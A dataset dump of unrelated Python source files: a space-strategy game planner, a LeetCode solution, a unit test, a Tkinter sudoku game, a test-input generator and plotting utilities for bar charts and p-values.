import PlannerMixin\n\nlogger = logging.getLogger(__name__)\nDEUT_TO_MET_OFFSET = 7\nCRYS_TO_MET_OFFSET = 3\nROB_TO_SOL_RATIO = 2.4\nMET_TANK_RATIO = 7\nCRYS_TANK_RATIO = 9\n\n\nclass Planet(PlannerMixin):\n\n def __init__(self, name, coords, position, **kwargs):\n self.name = name\n self.coords = coords\n self.position = position\n self.idle = kwargs.get('idle', False)\n self.capital = kwargs.get('capital', False)\n self.waiting_for = kwargs.get('waiting_for', {})\n\n self.fleet = kwargs.get('fleet', Fleet())\n self.resources = kwargs.get('resources', Resources())\n self.constructs = kwargs.get('constructs', Constructions())\n self.plans = kwargs.get('plans', Constructions())\n PlannerMixin.__init__(self, 'constructs', 'plans')\n\n for ships in [ships for ships in self.fleet if not ships.quantity]:\n self.fleet.remove(ships)\n\n def get_curr(self, obj, bump_level=False):\n curr = self.constructs.cond(\n name=obj if isinstance(obj, str) else obj.name).first\n return curr.copy(curr.level) if bump_level else curr\n\n @property\n def key(self):\n return coords_to_key(self.coords)\n\n @property\n def is_fleet_empty(self):\n return not bool(self.fleet)\n\n @property\n def is_idle(self):\n return self.idle and not self.waiting_for\n\n @property\n def is_waiting(self):\n return bool(self.waiting_for)\n\n @property\n def is_metal_tank_full(self):\n return self.resources.metal >= self.get_curr('metal_tank').capacity\n\n @property\n def is_crystal_tank_full(self):\n return self.resources.crystal >= self.get_curr('crystal_tank').capacity\n\n @property\n def is_deuterium_tank_full(self):\n current_deut_cap = self.get_curr('deuterium_tank').capacity\n return self.resources.deuterium >= current_deut_cap\n\n def time_to_construct(self, cost):\n return ((float(cost.metal) + cost.crystal)\n / (2500. 
* (float(self.get_curr('robot_factory').level) + 1.)\n * pow(2., float(self.get_curr('nanite_factory').level))))\n\n def requirements_for(self, building):\n building_types = tuple(self.constructs.registry.values())\n unmatched_req = False\n for req in building.requirements or []:\n if (isinstance(req, building_types)\n and req.level > self.get_curr(req).level):\n unmatched_req = True\n yield from self.requirements_for(req)\n if unmatched_req:\n return\n if building.level > self.get_curr(building).level + 1:\n yield from self.requirements_for(\n building.__class__(building.level - 1))\n return\n yield building\n\n @property\n def to_construct(self):\n # Handling construction list\n metal_mine = self.get_curr('metal_mine')\n metal_tank = self.get_curr('metal_tank')\n crystal_tank = self.get_curr('crystal_tank')\n deut_tank = self.get_curr('deuterium_tank')\n solar_plant = self.get_curr('solar_plant')\n\n trigger_crys_lvl = metal_mine.level - CRYS_TO_MET_OFFSET\n trigger_deut_lvl = metal_mine.level - DEUT_TO_MET_OFFSET\n trigger_rob_lvl = int(solar_plant.level / ROB_TO_SOL_RATIO)\n\n cnstr = metal_mine\n if self.get_curr('crystal_mine').level < trigger_crys_lvl:\n cnstr = self.get_curr('crystal_mine')\n elif self.get_curr('deuterium_synthetizer').level < trigger_deut_lvl:\n cnstr = self.get_curr('deuterium_synthetizer')\n # more or less 5%\n if cnstr.cost.energy * .95 > self.resources.energy:\n cnstr = solar_plant\n if self.get_curr('robot_factory').level < trigger_rob_lvl:\n cnstr = self.get_curr('robot_factory')\n if cnstr.level >= 10:\n cnstr = self.get_curr('nanite_factory')\n if self.capital:\n if metal_tank.capacity < cnstr.cost.metal \\\n or self.is_metal_tank_full:\n cnstr = metal_tank\n elif crystal_tank.capacity < cnstr.cost.crystal \\\n or self.is_crystal_tank_full:\n cnstr = crystal_tank\n elif deut_tank.capacity < cnstr.cost.deuterium \\\n or self.is_deuterium_tank_full:\n cnstr = deut_tank\n else:\n def should_build_tank(res_type, ratio):\n mine = self.get_curr('%s_mine' % res_type)\n tank = self.get_curr('%s_tank' % res_type)\n return float(mine.level) / (1 + tank.level) > ratio\n if should_build_tank('metal', MET_TANK_RATIO):\n cnstr = self.get_curr('metal_tank')\n elif should_build_tank('crystal', CRYS_TANK_RATIO):\n cnstr = self.get_curr('crystal_tank')\n yield from self.requirements_for(cnstr.copy(level=cnstr.level + 1))\n\n @classmethod\n def load(cls, **kwargs):\n for key, attr_cls in (('fleet', Fleet),\n ('resources', Resources),\n ('constructs', Constructions),\n ('plans', Constructions)):\n kwargs[key] = attr_cls.load(**kwargs.get(key, {'data': {}}))\n return cls(**kwargs)\n\n def dump(self):\n return {'name': self.name,\n 'coords': self.coords,\n 'idle': self.idle,\n 'position': self.position,\n 'waiting_for': self.waiting_for,\n 'capital': self.capital,\n 'resources': self.resources.dump(),\n 'fleet': {'data': self.fleet.dump()},\n 'constructs': {'data': self.constructs.dump()},\n 'plans': {'data': self.plans.dump()}}\n\n def __repr__(self):\n return r\"\" % (\n self.name, self.coords, self.position)\n\n def __str__(self):\n return '%s %r' % (self.name, coords_to_key(self.coords))\n\n def __eq__(self, other):\n if isinstance(other, Planet) and other.coords == self.coords:\n return True\n return False\n","sub_path":"pyogame/planet.py","file_name":"planet.py","file_ext":"py","file_size_in_byte":6371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"361929559","text":"# method 2, better than method 1\n# 
https://leetcode.com/problems/reconstruct-original-digits-from-english\n# /discuss/91207/one-pass-O(n)-JAVA-Solution-Simple-and-Clear\n\n\n\n\n# method 1, each digit has a unique letter\n\n\n\"\"\"\n'z', '0', 'zero'\n'w', '2', 'two'\n'x', '6', 'six'\n'u', '4', 'four'\n'g', '8', 'eight'\n\n't', '3', 'three'\n'f', '5', 'five'\n's', '7', 'seven'\n'o', '1', 'one'\n\n'e', '9', 'nine'\n\n\"\"\"\n\nimport collections\n\n\nclass Solution(object):\n def originalDigits(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n seq = [('z', '0', 'zero'), ('w', '2', 'two'), ('x', '6', 'six'),\n ('u', '4', 'four'), ('g', '8', 'eight'), ('t', '3', 'three'),\n ('f', '5', 'five'), ('s', '7', 'seven'), ('o', '1', 'one'),\n ('e', '9', 'nine')]\n digit_counts = {str(i): 0 for i in range(10)}\n s_counter = collections.Counter(s)\n for c, digit, english in seq:\n if s_counter.get(c, 0) > 0:\n cnt = s_counter[c]\n digit_counts[digit] = cnt\n for c_del in english: # remove all letters that are used\n s_counter[c_del] -= cnt\n res = []\n for digit in range(10):\n digit = str(digit)\n res.append(digit * digit_counts[digit])\n return \"\".join(res)\n\n\n\"\"\"\nGiven a non-empty string containing an out-of-order English representation of digits 0-9, \noutput the digits in ascending order.\n\nNote:\nInput contains only lowercase English letters.\nInput is guaranteed to be valid and can be transformed to its original digits. \nThat means invalid inputs such as \"abc\" or \"zerone\" are not permitted.\nInput length is less than 50,000.\nExample 1:\nInput: \"owoztneoer\"\n\nOutput: \"012\"\nExample 2:\nInput: \"fviefuro\"\n\nOutput: \"45\"\n\"\"\"","sub_path":"0423. Reconstruct Original Digits from English.py","file_name":"0423. Reconstruct Original Digits from English.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"287215665","text":"#!/usr/bin/python3\n\nimport unittest\n\nfrom skills.skill import SkillInput\nfrom skills.change_assistant_voice_skill import ChangeAssistantVoiceSkill\nfrom nlp.universal_dependencies import ParsedUniversalDependencies\n\nclass TestChangeAssistantVoiceSkill(unittest.TestCase):\n \"\"\"Unit tests for `ChangeAssistantVoiceSkill`.\"\"\"\n def setUp(self):\n self.skill = ChangeAssistantVoiceSkill()\n \n def test_skillShouldRecognizeCommand(self):\n verbs = [\"use\"]\n\n for verb in verbs:\n ud = ParsedUniversalDependencies(verb=verb)\n skill_input = SkillInput(ud, False)\n self.assertTrue(\n self.skill.matches_command(skill_input),\n f\"ChangeAssistantVoiceSkill did not recognize verb='{verb}'\")","sub_path":"LTUAssistantPlus/test/skills/test_change_assistant_voice_skill.py","file_name":"test_change_assistant_voice_skill.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"8833366","text":"#!/usr/bin/env python\n# coding:utf-8\n\nimport tkinter as tk\nimport base64\nimport os\nimport random\nfrom tkinter import messagebox\nfrom PIL import Image, ImageTk\nimport sudoku_calc\nimport sudoku\nfrom icon import JPG_IMG, ICO_IMG\n\n\nclass Mygui:\n\n def __init__(self):\n # 记录当前已完成的题目个数\n self.count = 0\n self.coord = []\n self.value = [[0 for i in range(11)] for j in range(11)]\n self.ety = [[0 for i in range(11)] for j in range(11)]\n self.tmp = sudoku_calc.SD(switch=False)\n self.tmp.pmt()\n\n def bind(self):\n value_ls = self.tmp.create_puzzle(self.count)\n infl1 = [0, 1, 2, 4, 5, 6, 8, 9, 10]\n infl2 = [(0, 0), (0, 3), 
(0, 6), (3, 0), (3, 3), (3, 6), (6, 0), (6, 3), (6, 6)]\n rmlist1 = []\n rmlist2 = []\n for i in range(9):\n for j in range(9):\n self.value[infl1[i]][infl1[j]].set(value_ls[i][j])\n self.ety[infl1[i]][infl1[j]]['state'] = 'readonly'\n self.ety[infl1[i]][infl1[j]]['fg'] = 'red'\n rmlist2.append((i, j))\n\n # 保证每个区至少有两个挖空\n tmp_ls = list(range(9))\n coord_a = tmp_ls.pop(random.randint(0, 8))\n coord_b = tmp_ls.pop(random.randint(0, 7))\n rmlist1.append(tuple(map(lambda x, y: x+y, (int(coord_a/3), coord_a%3), infl2[i])))\n rmlist1.append(tuple(map(lambda x, y: x+y, (int(coord_b/3), coord_b%3), infl2[i])))\n\n # 随机生成18+num个空\n num = random.randint(12, 42)\n rmleft = set(rmlist2)\n rmleft.difference_update(set(rmlist1))\n\n # rmleft为除去那18个空外还剩余的位置\n left = list(rmleft)\n for i in range(num):\n\n # 再随机选择num个空添加到rmlist1,此时rmlist1有30-60对坐标\n rmlist1.append(left.pop(random.randint(0, len(left)-1)))\n for i in rmlist1:\n\n # 将rmlist1中坐标的点的值都置空\n self.value[infl1[i[0]]][infl1[i[1]]].set('')\n self.ety[infl1[i[0]]][infl1[i[1]]]['state'] = 'normal'\n self.ety[infl1[i[0]]][infl1[i[1]]]['fg'] = 'black'\n self.ety[infl1[i[0]]][infl1[i[1]]]['bg'] = '#F0F0F0'\n\n # 题目计数+1\n self.count += 1\n\n def check(self):\n hash_ls = [0, 1, 2, 4, 5, 6, 8, 9, 10]\n grid = [[0 for i in range(9)] for j in range(9)]\n\n # 输入不合法时报错\n for i in range(9):\n for j in range(9):\n grid[i][j] = self.value[hash_ls[i]][hash_ls[j]].get()\n if grid[i][j] not in list(map(str, list(range(1, 10)))):\n messagebox.showerror('Result', 'Wrong Answer!')\n return\n grid[i][j] = {int(grid[i][j])}\n\n row = []\n col = []\n part = []\n for i in range(9):\n row.append(sudoku.row_left(grid[i]))\n col.append(sudoku.row_left([rowig[i] for rowig in grid]))\n part.append(sudoku.row_left(sudoku.comb(grid, 3*(int(i/3)), 3*(i % 3))))\n if sudoku.isnone(row) and sudoku.isnone(col) and sudoku.isnone(part):\n messagebox.showinfo('Result', 'Perfect!')\n else:\n messagebox.showerror('Result', 'Wrong Answer!')\n\n\n def gui(self):\n root = tk.Tk()\n # 设置窗口宽度与高度不可变\n root.resizable(False, False)\n root.title(\"Sudoku\")\n\n # 从文件中读取并解码生成临时图标,用完后立马删除\n tmp = open(\"tmp.ico\", \"wb+\")\n tmp.write(base64.b64decode(ICO_IMG))\n tmp.close()\n #im = Image.open(\"tmp.ico\")\n #img = ImageTk.PhotoImage(im)\n #root.tk.call('wm', 'iconphoto', root._w, img)\n root.iconbitmap('tmp.ico')\n os.remove(\"tmp.ico\")\n tmp = open(\"tmp.jpg\", \"wb+\")\n tmp.write(base64.b64decode(JPG_IMG))\n tmp.close()\n tmp_image = Image.open(\"tmp.jpg\")\n photo = ImageTk.PhotoImage(tmp_image)\n label = tk.Label(root, image=photo)\n os.remove(\"tmp.jpg\")\n # for i in range(11):\n # root.rowconfigure(i,weight=1)\n # root.columnconfigure(i,weight=1)\n # root.rowconfigure(11,weight=1)\n\n # 生成空格\n for i in range(11):\n for j in range(11):\n if i != 3 and i != 7 and j != 3 and j != 7:\n self.value[i][j] = tk.StringVar()\n self.ety[i][j] = tk.Entry(root, textvariable=self.value[i][j], width=2, font=90)\n self.ety[i][j].grid(row=i, column=j, padx=12, pady=12, sticky='NSEW')\n\n # 生成第一个题目并显示\n self.bind()\n\n label.grid(row=0, column=0, rowspan=12, columnspan=11, sticky='NSEW')\n\n # 确定按钮\n submit_btn = tk.Button(root, text='OK', command=lambda:self.check())\n submit_btn.grid(row=11, column=9, pady=10, ipadx=30, columnspan=2)\n\n # next按钮\n next_btn = tk.Button(root, text='Next>', command=lambda:self.bind())\n next_btn.grid(row=11, column=0, pady=10, ipadx=20, columnspan=2)\n\n root.mainloop()\n\n\ndef main():\n sudokugui = Mygui()\n sudokugui.gui()\n\n\nif __name__ == '__main__':\n 
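# Aside: check() above reduces to one invariant -- a completed grid is a\n # valid solution iff every row, column and 3x3 box holds the digits 1-9\n # exactly once. A standalone sketch of that test (illustrative helper,\n # not part of the sudoku module):\n #\n # def grid_is_solved(grid): # grid: 9x9 nested list of ints\n # from itertools import chain\n # full = set(range(1, 10))\n # rows = (set(r) for r in grid)\n # cols = (set(c) for c in zip(*grid))\n # boxes = ({grid[r + i][c + j] for i in range(3) for j in range(3)}\n # for r in (0, 3, 6) for c in (0, 3, 6))\n # return all(group == full for group in chain(rows, cols, boxes))\n 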
main()\n","sub_path":"Sudoku Gui/sudokugui.py","file_name":"sudokugui.py","file_ext":"py","file_size_in_byte":5250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"211218373","text":"#! /usr/bin/python\n\nimport random\nimport math\n\nfor i in range(1,101):\n # Casos al azar\n n = random.randint(1,1000)\n m = random.randint(1,1000)\n s = random.randint(1,200)\n ih = random.randint(1,n)\n iv = random.randint(1,m)\n bh = random.randint(1,n)\n bv = random.randint(1,m)\n fout = open(\"./testsTiempos/random/{:03d}.in\".format(i), 'w')\n fout.write(\"{} {} {}\\n\".format(n,m,s))\n fout.write(\"{} {} {} {}\\n\".format(ih,iv,bh,bv))\n for x in range(0, n-1):\n for bla in range(0,m-1):\n z = random.randint(0,2*s)\n fout.write('{} '.format(z))\n fout.write(\"\\n\")\n for bla in range(0,m):\n z = random.randint(0,2*s)\n fout.write('{} '.format(z))\n for bla in range(0,m-1):\n z = random.randint(0,2*s)\n fout.write('{} '.format(z))\n fout.close()\n tambytes = 32 * n * m\n print(\"Test {:03d} ocupa {:06}MBs\".format(i,((tambytes/1024)/1024)))\n\nfor i in range(1,101):\n # Peor caso: grilla cuadrada con menos zombis que soldados en todas las calles\n # y hay que recorrer de una esquina a la otra\n n = int(math.sqrt(i*250000))\n s = 100\n ih = 1\n iv = 1\n bh = n\n bv = n\n fout = open(\"./testsTiempos/peorcaso/{:03d}.in\".format(i), 'w')\n fout.write(\"{} {} {}\\n\".format(n,n,s))\n fout.write(\"{} {} {} {}\\n\".format(ih,iv,bh,bv))\n for x in range(0, n-1):\n for bla in range(0,n-1):\n z = 10\n fout.write('{} '.format(z))\n fout.write(\"\\n\")\n for bla in range(0,n):\n z = 10\n fout.write('{} '.format(z))\n for bla in range(0,n-1):\n z = 10\n fout.write('{} '.format(z))\n fout.close()\n tambytes = 32 * n * n\n print(\"Test {:03d} ocupa {:06}MBs\".format(i,((tambytes/1024)/1024)))\n","sub_path":"tp2/src/zombieland2/gentest.py","file_name":"gentest.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"364372831","text":"from os import path\nfrom pathlib import Path\nfrom re import X\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\nimport pandas as pd\nimport os\n\ncros = []\nretro = []\n\ndef generateAgreg(File:path):\n df = pd.read_csv(File)\n out = 0.0\n cnt = 0\n for index,rows in df.iterrows():\n out = out + float(rows['W'])\n cnt = cnt+1\n return out/cnt\n\n\ndef visu(retro,cros):\n fig = go.Figure()\n x_val = [\"Kicsit\", \"Közepes I.\", \"Közepes II.\", \"Nagy\"]\n fig.add_trace(go.Scatter(y= x_val, x=retro,name=\"Retrográd\",mode='markers'))\n fig.add_trace(go.Scatter(y= x_val, x=cros,name=\"Keresztpálya\",mode='markers'))\n\n\n fig.update_layout(\n yaxis_tickformat = 'eBit/s'\n ,\n xaxis=dict(\n title=\"Átlagos másodpercenként átvitt összefonódott kvantumbitek\",\n \n ),\n width=1000,\n )\n\n #fig.show()\n fig.write_image(f\"agreg.jpeg\",scale=3)\n\nfor child in Path('.').iterdir():\n if child.is_dir():\n for child2 in Path(\"./\"+child.name).iterdir(): \n if child2.is_file() and child2.name.__contains__(\".csv\"):\n print(f\"{child}\\n\")\n if child.name.__contains__(\"CROS\"):\n cros.append(generateAgreg(child2))\n else:\n 
retro.append(generateAgreg(child2))\n\nprint(retro)\nprint(cros)\nvisu(retro,cros)","sub_path":"src/Data/Output/csvTolatex.py","file_name":"csvTolatex.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"123996294","text":"\"\"\"Analysis visualization functions\n\"\"\"\n\nimport numpy as np\nfrom itertools import chain\ntry:\n import matplotlib.pyplot as plt\n from matplotlib import rcParams\nexcept ImportError:\n plt = None\ntry:\n from pandas.core.frame import DataFrame\nexcept ImportError:\n DataFrame = None\n\nfrom .._utils import string_types\n\n\ndef format_pval(pval, latex=True, scheme='default'):\n \"\"\"Format a p-value using one of several schemes.\n\n Parameters\n ----------\n pval : float | array-like\n The raw p-value(s).\n latex : bool\n Whether to use LaTeX wrappers suitable for use with matplotlib.\n scheme : str\n A keyword indicating the formatting scheme. Currently supports \"ross\"\n and \"default\"; any other string will yield the same as \"default\".\n\n Returns\n -------\n pv : str | np.objectarray\n A string or array of strings of formatted p-values. If a list output is\n preferred, users may call ``.tolist()`` on the output of the function.\n \"\"\"\n single_value = False\n if np.array(pval).shape == ():\n single_value = True\n pval = np.atleast_1d(np.asanyarray(pval))\n # add a tiny amount to handle cases where p is exactly a power of ten\n pval = pval + np.finfo(pval.dtype).eps\n expon = np.trunc(np.log10(pval)).astype(int) # exponents\n pv = np.zeros_like(pval, dtype=object)\n if latex:\n wrap = '$'\n brac = '{{'\n brak = '}}'\n else:\n wrap = ''\n brac = ''\n brak = ''\n if scheme == 'ross': # (exact value up to 4 decimal places)\n pv[pval >= 0.0001] = [wrap + 'p = {:.4f}'.format(x) + wrap\n for x in pval[pval > 0.0001]]\n pv[pval < 0.0001] = [wrap + 'p < 10^' + brac + '{}'.format(x) + brak +\n wrap for x in expon[pval < 0.0001]]\n else: # scheme == 'default'\n pv[pval >= 0.05] = wrap + 'n.s.' + wrap\n pv[pval < 0.05] = wrap + 'p < 0.05' + wrap\n pv[pval < 0.01] = wrap + 'p < 0.01' + wrap\n pv[pval < 0.001] = wrap + 'p < 0.001' + wrap\n pv[pval < 0.0001] = [wrap + 'p < 10^' + brac + '{}'.format(x) + brak +\n wrap for x in expon[pval < 0.0001]]\n if single_value:\n pv = pv[0]\n return(pv)\n\n\ndef barplot(h, axis=-1, ylim=None, err_bars=None, lines=False, groups=None,\n eq_group_widths=False, brackets=None, bracket_text=None,\n gap_size=0.2, bar_names=None, group_names=None, bar_kwargs=None,\n err_kwargs=None, line_kwargs=None, bracket_kwargs=None,\n figure_kwargs=None, smart_defaults=True, fname=None, ax=None):\n \"\"\"Makes barplots w/ optional line overlays, grouping, & signif. brackets.\n\n Parameters\n ----------\n h : array-like\n If ``h`` is 2-dimensional, heights will be calculated as means along\n the axis given by ``axis``. If ``h`` is of lower dimension, it is\n treated as raw height values. If ``h`` is a pandas ``DataFrame`` and\n ``bar_names`` is None, ``bar_names`` will be inferred from the\n ``DataFrame``'s ``column`` labels (if ``axis=0``) or ``index`` labels.\n axis : int\n The axis along which to calculate mean values to determine bar heights.\n Ignored if ``h`` is 0- or 1-dimensional.\n ylim : tuple | None\n y-axis limits passed to ``matplotlib.pyplot.subplot.set_ylim()``.\n err_bars : str | array-like | None\n Type of error bars to be added to the barplot. 
Possible values are\n ``'sd'`` for sample standard deviation, ``'se'`` for standard error of\n the mean, or ``'ci'`` for 95% confidence interval. If ``None``, no\n error bars will be plotted. Custom error bar heights are possible by\n passing an array-like object; in such cases ``err_bars`` must have the\n same dimensionality and shape as ``h``.\n lines : bool\n Whether to plot within-subject data as lines overlaid on the barplot.\n groups : list | None\n List of lists containing the integers in ``range(num_bars)``, with\n sub-lists indicating the desired grouping. For example, if ``h`` has\n has shape (10, 4) and ``axis = -1`` then \"num_bars\" is 4; if you want\n the first bar isolated and the remaining three grouped, then specify\n ``groups=[[0], [1, 2, 3]]``.\n eq_group_widths : bool\n Should all groups have the same width? If ``False``, all bars will have\n the same width. Ignored if ``groups=None``, since the bar/group\n distinction is meaningless in that case.\n brackets : list of tuples | None\n Location of significance brackets. Scheme is similar to ``grouping``;\n if you want a bracket between the first and second bar and another\n between the third and fourth bars, specify as [(0,1),(2,3)]. If you\n want brackets between groups of bars instead of between bars, indicate\n the group numbers as singleton lists within the tuple: [([0], [1])].\n bracket_text : str | list | None\n text to display above brackets.\n gap_size : float\n Width of the gap between groups (if ``eq_group_width = True``) or\n between bars, expressed as a proportion [0,1) of group or bar width.\n bar_names : array-like | None\n Optional axis labels for each bar.\n group_names : array-like | None\n Optional axis labels for each group.\n bar_kwargs : dict\n Arguments passed to ``matplotlib.pyplot.bar()`` (ex: color, linewidth).\n err_kwargs : dict\n Arguments passed to ``matplotlib.pyplot.bar(error_kw)`` (ex: ecolor,\n capsize).\n line_kwargs : dict\n Arguments passed to ``matplotlib.pyplot.plot()`` (e.g., color, marker,\n linestyle).\n bracket_kwargs : dict\n arguments passed to ``matplotlib.pyplot.plot()`` (e.g., color, marker,\n linestyle).\n figure_kwargs : dict\n arguments passed to ``matplotlib.pyplot.figure()`` (e.g., figsize, dpi,\n frameon).\n smart_defaults : bool\n Whether to use pyplot default colors (``False``), or something more\n pleasing to the eye (``True``).\n fname : str | None\n Path and name of output file. Type is inferred from ``fname`` and\n should work for any of the types supported by pyplot (pdf, eps,\n svg, png, raw).\n ax : matplotlib.pyplot.axes | None\n A ``matplotlib.pyplot.axes`` instance. 
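An illustrative call reusing an existing axes (a sketch, not from the package's own docs): ``fig, ax = plt.subplots(); barplot(h, axis=0, err_bars='se', ax=ax)``. 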
If none, a new figure with a\n single subplot will be created.\n\n Returns\n -------\n p : handle for the ``matplotlib.pyplot.subplot`` instance.\n b : handle for the ``matplotlib.pyplot.bar`` instance.\n\n Notes\n -----\n Smart defaults sets the following parameters:\n bar color: light gray (70%)\n error bar color: black\n line color: black\n bracket color: dark gray (30%)\n \"\"\"\n # check matplotlib\n if plt is None:\n raise ImportError('Barplot requires matplotlib.pyplot.')\n # be nice to pandas\n if DataFrame is not None:\n if isinstance(h, DataFrame) and bar_names is None:\n if axis == 0:\n bar_names = h.columns.tolist()\n else:\n bar_names = h.index.tolist()\n # check arg errors\n if gap_size < 0 or gap_size >= 1:\n raise ValueError('Barplot argument \"gap_size\" must be in the range '\n '[0, 1).')\n if err_bars is not None:\n if isinstance(err_bars, string_types) and \\\n err_bars not in ['sd', 'se', 'ci']:\n raise ValueError('err_bars must be \"sd\", \"se\", or \"ci\" (or an '\n 'array of error bar magnitudes).')\n # handle single-element args\n if isinstance(bracket_text, string_types):\n bracket_text = [bracket_text]\n if isinstance(group_names, string_types):\n group_names = [group_names]\n # arg defaults\n if bar_kwargs is None:\n bar_kwargs = dict()\n if err_kwargs is None:\n err_kwargs = dict()\n if line_kwargs is None:\n line_kwargs = dict()\n if bracket_kwargs is None:\n bracket_kwargs = dict()\n if figure_kwargs is None:\n figure_kwargs = dict()\n # user-supplied Axes\n if ax is not None:\n bar_kwargs['axes'] = ax\n # smart defaults\n if smart_defaults:\n if 'color' not in bar_kwargs.keys():\n bar_kwargs['color'] = '0.7'\n if 'color' not in line_kwargs.keys():\n line_kwargs['color'] = 'k'\n if 'ecolor' not in err_kwargs.keys():\n err_kwargs['ecolor'] = 'k'\n if 'color' not in bracket_kwargs.keys():\n bracket_kwargs['color'] = '0.3'\n # parse heights\n h = np.array(h)\n if len(h.shape) > 2:\n raise ValueError('Barplot \"h\" must have 2 or fewer dimensions.')\n elif len(h.shape) < 2:\n heights = np.atleast_1d(h)\n two_d = False\n else:\n heights = h.mean(axis=axis)\n two_d = True\n # grouping\n num_bars = len(heights)\n if groups is None:\n groups = [[x] for x in range(num_bars)]\n num_groups = len(groups)\n if eq_group_widths:\n group_widths = [1 - gap_size for _ in range(num_groups)]\n group_edges = [x + gap_size for x in range(num_groups)]\n bar_widths = [[(1 - gap_size) / len(x) for _ in enumerate(x)]\n for x in groups]\n bar_edges = [[gap_size / 2 + grp + (1 - gap_size) * bar / len(x) for\n bar, _ in enumerate(x)] for grp, x in enumerate(groups)]\n else:\n bar_widths = [[1 - gap_size for _ in x] for x in groups]\n bar_edges = [[gap_size / 2 + grp * gap_size + (1 - gap_size) * bar for\n bar in x] for grp, x in enumerate(groups)]\n group_widths = [np.sum(x) for x in bar_widths]\n group_edges = [x[0] for x in bar_edges]\n\n bar_edges = list(chain.from_iterable(bar_edges))\n bar_widths = list(chain.from_iterable(bar_widths))\n bar_centers = np.array(bar_edges) + np.array(bar_widths) / 2\n group_centers = np.array(group_edges) + np.array(group_widths) / 2\n # calculate error bars\n if err_bars is not None:\n if two_d:\n if err_bars == 'sd': # sample standard deviation\n err = h.std(axis=axis)\n elif err_bars == 'se': # standard error\n h.shape[axis]\n err = h.std(axis) / np.sqrt(h.shape[axis])\n else: # 95% conf int\n err = 1.96 * h.std(axis) / np.sqrt(h.shape[axis])\n else: # two_d == False\n if isinstance(err_bars, string_types):\n raise ValueError('string arguments to 
\"err_bars\" ignored when '\n '\"h\" has fewer than 2 dimensions.')\n else:\n err_bars = np.atleast_1d(err_bars)\n if not h.shape == err_bars.shape:\n raise ValueError('When \"err_bars\" is array-like it must '\n 'have the same shape as barplot arg \"h\".')\n err = err_bars\n bar_kwargs['yerr'] = err\n else: # still must define err (for signif. brackets)\n err = np.zeros(num_bars)\n # plot (bars and error bars)\n if ax is None:\n plt.figure(**figure_kwargs)\n p = plt.subplot(1, 1, 1)\n else:\n p = ax\n b = p.bar(bar_edges, heights, bar_widths, error_kw=err_kwargs,\n **bar_kwargs)\n # within-subject lines\n if two_d:\n max_pts = np.max(h, axis)\n else:\n max_pts = heights\n if lines:\n if axis == 0:\n xy = [(bar_centers, hts) for hts in h]\n else:\n xy = [(bar_centers, hts) for hts in h.T]\n for subj in xy:\n p.plot(subj[0], subj[1], **line_kwargs)\n else:\n max_pts.fill(0)\n # significance brackets\n apices = np.max(np.r_[np.atleast_2d(heights + err),\n np.atleast_2d(max_pts)], axis=0)\n group_apices = [np.max(apices[x]) for x in groups]\n if brackets is not None:\n if not len(brackets) == len(bracket_text):\n raise ValueError('Mismatch between number of brackets and bracket '\n 'labels.')\n brk_offset = np.diff(p.get_ylim()) * 0.025\n brk_height = np.diff(p.get_ylim()) * 0.05\n for pair, text in zip(brackets, bracket_text):\n if len(pair) != 2:\n raise ValueError('brackets must be list of 2-element tuples.')\n ylo = []\n xlr = []\n for br in pair:\n if hasattr(br, 'append'): # it's a group, not a single bar\n br = br[0]\n xlr.append(group_centers[br])\n ylo.append(group_apices[br] + brk_offset)\n gbr = (bar_centers[groups[br][0]],\n bar_centers[groups[br][-1]])\n p.plot(gbr, (ylo[-1], ylo[-1]), **bracket_kwargs)\n else:\n xlr.append(bar_centers[br])\n ylo.append(apices[br] + brk_offset)\n yhi = max(ylo) + brk_height\n # points defining brackets\n lbr = ((xlr[0], xlr[0]), (ylo[0], yhi))\n rbr = ((xlr[1], xlr[1]), (ylo[1], yhi))\n hbr = (tuple(xlr), (yhi, yhi))\n for x, y in [lbr, rbr, hbr]:\n p.plot(x, y, **bracket_kwargs)\n # bracket text\n txt = p.annotate(text, (np.mean(xlr), yhi + brk_offset/2.),\n xytext=(0, 1), textcoords='offset points',\n ha='center', annotation_clip=False)\n txt.set_bbox(dict(facecolor='w', alpha=0, boxstyle='round, pad=1'))\n plt.draw()\n txtb = txt.get_bbox_patch().get_window_extent()\n txtbb = p.transData.inverted().transform(txtb).ravel()[-1]\n ybnd = p.get_ybound()\n if txtbb > ybnd[-1]:\n p.set_ybound(ybnd[0], txtbb)\n # annotation\n box_off(p)\n p.tick_params(axis='x', length=0, pad=12)\n p.xaxis.set_ticks(bar_centers)\n if bar_names is not None:\n p.xaxis.set_ticklabels(bar_names, va='baseline')\n if group_names is not None:\n yoffset = -3 * rcParams['font.size']\n for gn, gp in zip(group_names, group_centers):\n p.annotate(gn, xy=(gp, 0), xytext=(0, yoffset),\n textcoords='offset points', ha='center', va='baseline')\n # axis limits\n p.set_xlim(0, bar_edges[-1] + bar_widths[-1] + gap_size / 2)\n if ylim is not None:\n p.set_ylim(ylim)\n # output file\n if fname is not None:\n from os.path import splitext\n fmt = splitext(fname)[-1][1:]\n plt.savefig(fname, format=fmt, transparent=True)\n # return handles for subplot and barplot instances\n plt.draw()\n return (p, b)\n\n\ndef box_off(ax):\n \"\"\"Remove the top and right edges of a plot frame, and point ticks outward.\n Parameter\n ---------\n ax : matplotlib.axes.Axes\n A matplotlib plot or subplot object.\n \"\"\"\n ax.get_xaxis().tick_bottom()\n ax.get_yaxis().tick_left()\n ax.tick_params(axis='x', 
